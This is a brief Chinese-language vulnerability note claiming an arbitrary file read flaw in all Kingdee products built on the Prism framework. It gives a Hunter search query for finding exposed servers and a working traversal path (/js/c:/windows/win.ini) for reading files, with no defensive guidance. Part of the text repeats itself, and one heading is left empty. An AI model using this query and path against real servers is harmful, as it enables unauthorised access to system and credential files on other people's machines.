金蝶产品任意文件读取
一、漏洞简介
金蝶所有引用prism框架的产品全版本存在任意文件读取漏洞
二、影响版本
- 目前金蝶所有引用prism框架的产品全版本
三、资产测绘
- hunter
header="prism_anonymous"||web.title="Welcome to Prism"||web.title="Sisense License Expired"
- 特征
四、漏洞复现
/js/c:/windows/win.ini
金蝶所有引用prism框架的产品全版本存在任意文件读取漏洞
header="prism_anonymous"||web.title="Welcome to Prism"||web.title="Sisense License Expired"
/js/c:/windows/win.ini